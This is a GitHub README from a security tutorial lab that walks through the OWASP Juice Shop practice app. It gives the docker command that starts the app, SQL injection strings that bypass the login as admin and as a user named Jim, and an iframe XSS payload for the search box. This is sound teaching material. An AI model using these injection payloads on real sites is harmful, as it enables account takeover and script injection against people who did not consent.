manuth/UKBTutorials
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity
UKBTutorials/Lab03 - Let's Buy Some Juice
History
Manuel Thalmann 07d9514db3 Solve XSS task
2023-11-10 13:09:54 +01:00
..
README.md Solve XSS task 2023-11-10 13:09:54 +01:00

README.md

Let's Buy Some Juice

Booting Up Juice Shop

docker run --pull always -p 127.0.0.1:80:3000 bkimminich/juice-shop

SQL Injection

Login as Admin

  1. Open Account => Login
  2. Type ' OR TRUE; -- into Email and any password in Password

Result:

Login as Jim

  1. Open Account => Login
  2. Type jim@juice-sh.op'; --

Result:

Cross Site Scripting

  1. Open up the Search Box
  2. Type <iframe src="javascript:alert('hello')">